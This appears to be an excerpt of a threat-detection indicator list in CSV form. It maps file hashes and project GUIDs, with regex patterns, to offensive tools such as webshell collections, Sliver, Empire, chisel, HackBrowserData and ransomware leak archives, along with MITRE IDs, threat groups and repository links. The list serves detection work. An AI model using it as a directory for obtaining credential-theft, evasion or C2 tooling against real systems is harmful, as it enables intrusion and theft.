"*e0df786633e47059eb4200a1b521acb4b496006fca3c5d511978a71df6a8d976*",".{0,1000}e0df786633e47059eb4200a1b521acb4b496006fca3c5d511978a71df6a8d976.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","N/A","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","41787" "*e0e4200ebb8381797450c5f7da031a1c389c31c3351370daa1b53c715ea07097*",".{0,1000}e0e4200ebb8381797450c5f7da031a1c389c31c3351370daa1b53c715ea07097.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","41788" "*e0e5c3370cdbc6fbe0531ffc55979217b24d4f0eaf18ed7567c4ffc6baf8845a*",".{0,1000}e0e5c3370cdbc6fbe0531ffc55979217b24d4f0eaf18ed7567c4ffc6baf8845a.{0,1000}","offensive_tool_keyword","Rust-Malware-Samples","open source informations stealer in rust","T1003 - T1083 - T1114 - T1074","TA0006 - TA0009 - TA0005","N/A","N/A","Credential 
Access","https://github.com/Whitecat18/Rust-for-Malware-Development/tree/main/Malware-Samples","1","0","#filehash","N/A","10","10","2123","53","2025-04-22T18:09:57Z","2024-02-12T16:55:06Z","41789" "*e0f7ac87107e30818d287964478bfef438a388682656a428099abeda00375f1a*",".{0,1000}e0f7ac87107e30818d287964478bfef438a388682656a428099abeda00375f1a.{0,1000}","offensive_tool_keyword","antSword","cross-platform website management toolkit - abused by attackers - supports the use of web shells","T1505.003 - T1059 - T1100 - T1027 - T1219 - T1071","TA0002 - TA0003 - TA0005 - TA0011","antSword webshell","APT41 - APT15","C2","https://github.com/AntSwordProject/antSword","1","0","#filehash","N/A","10","10","4010","616","2025-01-20T12:48:42Z","2016-03-11T09:28:00Z","41792" "*e104cbadc6c2d170ca642537aca707b86a7947df0c619b08b9d35d3c13c0e079*",".{0,1000}e104cbadc6c2d170ca642537aca707b86a7947df0c619b08b9d35d3c13c0e079.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","41794" "*e114380d61281bb9bffe5246d366342cecc6dfa22814b308fa08b075e0b0f35f*",".{0,1000}e114380d61281bb9bffe5246d366342cecc6dfa22814b308fa08b075e0b0f35f.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","41797" "*e11a3ad89cc8150c1ce7367b3360c717c6b39feb61986a37385af368df2083f9*",".{0,1000}e11a3ad89cc8150c1ce7367b3360c717c6b39feb61986a37385af368df2083f9.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","41799" "*e11cbe43-b8bc-4042-a4a5-c8e960925c83*",".{0,1000}e11cbe43\-b8bc\-4042\-a4a5\-c8e960925c83.{0,1000}","offensive_tool_keyword","shutter","The goal of Shutter is to manage windows network stack communication via Windows Filtering Platform. 
Management can include blocking or permiting traffic based on IP or an executable that initiates or receives the traffic.","T1562 - T1027","TA0005 - TA0007","N/A","N/A","Defense Evasion","https://github.com/dsnezhkov/shutter","1","0","#GUIDproject","N/A","10","2","116","15","2021-05-12T19:05:14Z","2021-05-12T18:51:03Z","41802" "*E11DC25D-E96D-495D-8968-1BA09C95B673*",".{0,1000}E11DC25D\-E96D\-495D\-8968\-1BA09C95B673.{0,1000}","offensive_tool_keyword","SilentMoonwalk","PoC Implementation of a fully dynamic call stack spoofer","T1055 - T1055.012 - T1562 - T1562.001 - T1070 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/klezVirus/SilentMoonwalk","1","0","#GUIDproject","N/A","9","8","760","100","2024-07-20T10:41:31Z","2022-12-04T13:30:33Z","41803" "*e11e118210b052c7d9ae1b8befde3254a6bf05ea82b8cca25d374aee39f064c4*",".{0,1000}e11e118210b052c7d9ae1b8befde3254a6bf05ea82b8cca25d374aee39f064c4.{0,1000}","offensive_tool_keyword","sgn","polymorphic encoder used in to obfuscate payloads","T1027","TA0005","N/A","N/A","Defense Evasion","https://github.com/EgeBalci/sgn","1","0","#filehash","N/A","8","10","1681","224","2024-02-22T17:35:59Z","2019-10-30T10:20:01Z","41804" "*e11e7c233271f76602b77312864c18c2daf0b4b86fd71422234776cb0b0ad04c*",".{0,1000}e11e7c233271f76602b77312864c18c2daf0b4b86fd71422234776cb0b0ad04c.{0,1000}","offensive_tool_keyword","sgn","polymorphic encoder used in to obfuscate payloads","T1027","TA0005","N/A","N/A","Defense Evasion","https://github.com/EgeBalci/sgn","1","0","#filehash","N/A","8","10","1681","224","2024-02-22T17:35:59Z","2019-10-30T10:20:01Z","41806" "*e11e7db705a11f8ca250d8d6826371e550b3214757f5bb9b648c7b0fad09294b*",".{0,1000}e11e7db705a11f8ca250d8d6826371e550b3214757f5bb9b648c7b0fad09294b.{0,1000}","offensive_tool_keyword","SharpShares","Multithreaded C# .NET Assembly to enumerate accessible network shares in a domain","T1046 - T1135","TA0007 - TA0001","N/A","BlackSuit - Royal - BianLian - 
Fog","Discovery","https://github.com/mitchmoser/SharpShares","1","0","#filehash","N/A","10","4","351","49","2021-09-21T08:14:27Z","2020-09-25T22:35:57Z","41807" "*e127778b3688b8d058d5043af5c65d12fc280c37f303db140a6535974d1ae554*",".{0,1000}e127778b3688b8d058d5043af5c65d12fc280c37f303db140a6535974d1ae554.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","41809" "*e12a9da86cf1e978789039ac79e8962af396dfe9c71db1aba39caed38a7f366e*",".{0,1000}e12a9da86cf1e978789039ac79e8962af396dfe9c71db1aba39caed38a7f366e.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","41810" "*e12b5b70989233ee34a1984b959ac4e42a282148cc0f6f8a5434f2a1502e3fdd*",".{0,1000}e12b5b70989233ee34a1984b959ac4e42a282148cc0f6f8a5434f2a1502e3fdd.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","41811" 
"*e13e6e6152026be625cf8af27fa44e767f83afd8aa0d0db0f7041075a8b647e7*",".{0,1000}e13e6e6152026be625cf8af27fa44e767f83afd8aa0d0db0f7041075a8b647e7.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","41813" "*e14014dee6af3c42ae29dfc7eb3eb03790020c3c28aa5262fffe4a3b93a6df0f*",".{0,1000}e14014dee6af3c42ae29dfc7eb3eb03790020c3c28aa5262fffe4a3b93a6df0f.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","41814" "*e1442c45400be7b8c2259e67c8df86c687583240414d8c1c085b69ff3493acc7*",".{0,1000}e1442c45400be7b8c2259e67c8df86c687583240414d8c1c085b69ff3493acc7.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","41816" "*e145a82842b920b4079c118dc86a28e268876701ac743a9b234472375037bf1d*",".{0,1000}e145a82842b920b4079c118dc86a28e268876701ac743a9b234472375037bf1d.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","41817" 
"*e15a5f2c86a2ab9c3276c3344960b6ee9c122645b0dd634c78d0617a47d6e0d8*",".{0,1000}e15a5f2c86a2ab9c3276c3344960b6ee9c122645b0dd634c78d0617a47d6e0d8.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","41818" "*e15ab99b615fc244af70a7d6bd7e834f0851ca1da63c4f17043c80f931cc0d8a*",".{0,1000}e15ab99b615fc244af70a7d6bd7e834f0851ca1da63c4f17043c80f931cc0d8a.{0,1000}","offensive_tool_keyword","MakeMeAdmin","Enables users to elevate themselves to administrator-level rights","T1078 - T1059 - T1087","TA0004","N/A","N/A","Privilege Escalation","https://github.com/pseymour/MakeMeAdmin","1","0","#filehash","N/A","9","5","430","94","2024-12-22T02:56:23Z","2018-05-29T19:42:58Z","41819" "*e15d7d10350005b94320906a3f324b1d054509cd3d0795921157daf0cee11e9a*",".{0,1000}e15d7d10350005b94320906a3f324b1d054509cd3d0795921157daf0cee11e9a.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","#filehash","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","41820" "*e1641d2918f41349e233feffd77b4f5088e4bc250d30a7be67693f3a09025088*",".{0,1000}e1641d2918f41349e233feffd77b4f5088e4bc250d30a7be67693f3a09025088.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red 
teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/cobbr/SharpSploit","1","0","#filehash","N/A","10","10","1789","312","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z","41822" "*e1792577b8a2878c0ee0e02c94c3113ed483e99e4d20d716f1c4c7589076f06b*",".{0,1000}e1792577b8a2878c0ee0e02c94c3113ed483e99e4d20d716f1c4c7589076f06b.{0,1000}","offensive_tool_keyword","SharpShares","Multithreaded C# .NET Assembly to enumerate accessible network shares in a domain","T1046 - T1135","TA0007 - TA0001","N/A","BlackSuit - Royal - BianLian - Fog","Discovery","https://github.com/mitchmoser/SharpShares","1","0","#filehash","N/A","10","4","351","49","2021-09-21T08:14:27Z","2020-09-25T22:35:57Z","41826" "*e17b62d1052bbed122fd65f701fe79600dc84b9dc9d4cd1e17c1dca2cc2c2e71*",".{0,1000}e17b62d1052bbed122fd65f701fe79600dc84b9dc9d4cd1e17c1dca2cc2c2e71.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - 
TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","0","#filehash","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","41827" "*E17B7339-C788-4DBE-B382-3AEDB024073D*",".{0,1000}E17B7339\-C788\-4DBE\-B382\-3AEDB024073D.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","#GUIDproject","N/A","6","10","3629","1661","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z","41828" "*e17d9c10a343762b54f938c0eaf63f479140792c7a27c876d4bccfe09e5d924c*",".{0,1000}e17d9c10a343762b54f938c0eaf63f479140792c7a27c876d4bccfe09e5d924c.{0,1000}","offensive_tool_keyword","SigmaPotato","SeImpersonate privilege escalation tool","T1134 - T1055 - T1543","TA0004 - TA0005 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/tylerdotrar/SigmaPotato","1","0","#filehash","N/A","9","4","326","38","2024-05-16T23:46:04Z","2023-09-09T01:35:42Z","41829" "*e18997da91a7bfcb5f6c35a843e35c3cf727ddd8b1dec167c9dff8af5f700f67*",".{0,1000}e18997da91a7bfcb5f6c35a843e35c3cf727ddd8b1dec167c9dff8af5f700f67.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","41831" 
"*E192C3DF-AE34-4E32-96BA-3D6B56EA76A4*",".{0,1000}E192C3DF\-AE34\-4E32\-96BA\-3D6B56EA76A4.{0,1000}","offensive_tool_keyword","Disable-TamperProtection","disable TamperProtection and other Defender / MDE components","T1562.001 - T1562.007","TA0005","N/A","N/A","Defense Evasion","https://github.com/AlteredSecurity/Disable-TamperProtection","1","0","#GUIDproject","N/A","10","3","208","35","2024-06-06T14:44:59Z","2024-06-05T12:48:56Z","41833" "*e19603f3ae1a655ed21fdf9544e936b4510704024aeffdb69125d87373509e88*",".{0,1000}e19603f3ae1a655ed21fdf9544e936b4510704024aeffdb69125d87373509e88.{0,1000}","offensive_tool_keyword","antSword","cross-platform website management toolkit - abused by attackers - supports the use of web shells","T1505.003 - T1059 - T1100 - T1027 - T1219 - T1071","TA0002 - TA0003 - TA0005 - TA0011","antSword webshell","APT41 - APT15","C2","https://github.com/AntSwordProject/antSword","1","0","#filehash","N/A","10","10","4010","616","2025-01-20T12:48:42Z","2016-03-11T09:28:00Z","41835" "*e1966d7c2abe5f6f610c745858ab19a48b1b4ee7db738e15f4bb8b1009f38eb9*",".{0,1000}e1966d7c2abe5f6f610c745858ab19a48b1b4ee7db738e15f4bb8b1009f38eb9.{0,1000}","offensive_tool_keyword","FruityC2","ruityC2 is a post-exploitation framework based on the deployment of agents on compromised machines","T1090 - T1572 - T1071.001","TA0010 - TA0011 - TA0008 - TA0005","N/A","MuddyWater","C2","https://github.com/xtr4nge/FruityC2","1","0","#filehash","https://documents.trendmicro.com/assets/white_papers/wp_new_muddywater_findings_uncovered.pdf","10","10","208","67","2017-12-04T17:05:23Z","2017-01-11T17:27:45Z","41836" "*e1a00c7c01ea97ed1aa4eed7493555bcecc1b7e2280d89f7bcc0631541ba4388*",".{0,1000}e1a00c7c01ea97ed1aa4eed7493555bcecc1b7e2280d89f7bcc0631541ba4388.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - 
T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#filehash","N/A","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","41837" "*e1a068365245f8a021fca5f8b40a2cc5aedd235015c39db6697b7d3ba05cd996*",".{0,1000}e1a068365245f8a021fca5f8b40a2cc5aedd235015c39db6697b7d3ba05cd996.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","41838" "*e1a58a89aa3d31654d9496700ebbfb27e2914cce90d78425864b948097c35090*",".{0,1000}e1a58a89aa3d31654d9496700ebbfb27e2914cce90d78425864b948097c35090.{0,1000}","offensive_tool_keyword","lolminer","NVIDIA+AMD GPU Miner","T1496","TA0040","N/A","N/A","Cryptomining","https://github.com/Lolliedieb/lolMiner-releases","1","0","#filehash","N/A","9","10","2781","601","2025-02-01T20:03:57Z","2018-10-27T20:35:03Z","41839" "*e1a5b167ec626fd934b6abac47d82987ba3313d505c1b3487072cca8ca9c4e65*",".{0,1000}e1a5b167ec626fd934b6abac47d82987ba3313d505c1b3487072cca8ca9c4e65.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux 
#windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","41840" "*e1aa34410dd260529c0e32bb0fbc5263f3042bf47d01dc5ad424bb8cecc2b887*",".{0,1000}e1aa34410dd260529c0e32bb0fbc5263f3042bf47d01dc5ad424bb8cecc2b887.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","41841" "*E1AC3CD517F50462DD5B022F4D0016F3B9E8BCD8FC72B86FBB94C36BBA6EE543*",".{0,1000}E1AC3CD517F50462DD5B022F4D0016F3B9E8BCD8FC72B86FBB94C36BBA6EE543.{0,1000}","offensive_tool_keyword","Dispossessor","Dispossessor ransomware scripts and binaries","T1486 - T1489 - T1490 - T1107 - T1059 - T1001","TA0040 - TA0042","N/A","Dispossessor","Ransomware ","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","41843" "*e1b23e90752a40a4a54afc406b874655f6d279a26e140402ad3f69509e9da496*",".{0,1000}e1b23e90752a40a4a54afc406b874655f6d279a26e140402ad3f69509e9da496.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","41844" "*e1b5f5c1f80865429429388b5d20c8b536b62b4596f19768bfacb315982697e8*",".{0,1000}e1b5f5c1f80865429429388b5d20c8b536b62b4596f19768bfacb315982697e8.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","41845" "*e1b86769bb6117e974ed565ca81ee32307d1f38cbecba8495e97c2555197d090*",".{0,1000}e1b86769bb6117e974ed565ca81ee32307d1f38cbecba8495e97c2555197d090.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","41846" "*e1bab498bacf77137139b848d080c2e4cb7d7e6b34573ec309ab3268de4ba089*",".{0,1000}e1bab498bacf77137139b848d080c2e4cb7d7e6b34573ec309ab3268de4ba089.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege 
Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","41847" "*e1cd2b55-3b4f-41bd-a168-40db41e34349*",".{0,1000}e1cd2b55\-3b4f\-41bd\-a168\-40db41e34349.{0,1000}","offensive_tool_keyword","ScriptSentry","ScriptSentry finds misconfigured and dangerous logon scripts.","T1037 - T1037.005 - T1046","TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/techspence/ScriptSentry","1","0","#GUIDproject","N/A","7","6","502","43","2024-12-20T21:27:24Z","2023-07-22T03:17:58Z","41849" "*e1cf6f45fb64f8e043740015fc1c48d68f8a062be61bc320dbf54fb25ee87fbf*",".{0,1000}e1cf6f45fb64f8e043740015fc1c48d68f8a062be61bc320dbf54fb25ee87fbf.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","41850" "*e1d459e568068bae8db668a9478e7d373afda5a174f2ea54a329056f5d6b681b*",".{0,1000}e1d459e568068bae8db668a9478e7d373afda5a174f2ea54a329056f5d6b681b.{0,1000}","offensive_tool_keyword","Dispossessor","hashes of AV removing scripts tools and notes from the Dispossessor ransomware group","T1562.001 - T1112 - T1059 - T1036","TA0005 - TA0040","N/A","Dispossessor","Defense Evasion","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","41851" "*E1D50AB4-E1CD-4C31-AED5-E957D2E6B01F*",".{0,1000}E1D50AB4\-E1CD\-4C31\-AED5\-E957D2E6B01F.{0,1000}","offensive_tool_keyword","fgdump","A utility for dumping passwords on Windows NT/2000/XP/2003 machines","T1003.001 - T1003.002 - T1077 - T1059 - T1035 - T1021.002 - T1562.001","TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0008","N/A","Volt 
Typhoon","Credential Access","https://github.com/ihamburglar/fgdump","1","0","#GUIDproject","N/A","10","1","8","4","2012-01-14T19:05:42Z","2015-10-11T17:08:47Z","41852" "*e1d9d19cb999647e1261d85578063cb1bd62a0f62ee22dadfdfa0ffd7f567fd6*",".{0,1000}e1d9d19cb999647e1261d85578063cb1bd62a0f62ee22dadfdfa0ffd7f567fd6.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","41855" "*e1ea0335cc65cd6ab35fb804fd5b5739ae1b26ef43be230a24113475edecf6bd*",".{0,1000}e1ea0335cc65cd6ab35fb804fd5b5739ae1b26ef43be230a24113475edecf6bd.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","41858" "*e1ed358b0e31199ca8ae3cc4307183d3131c27cef32c610bcc955a03527057bb*",".{0,1000}e1ed358b0e31199ca8ae3cc4307183d3131c27cef32c610bcc955a03527057bb.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux 
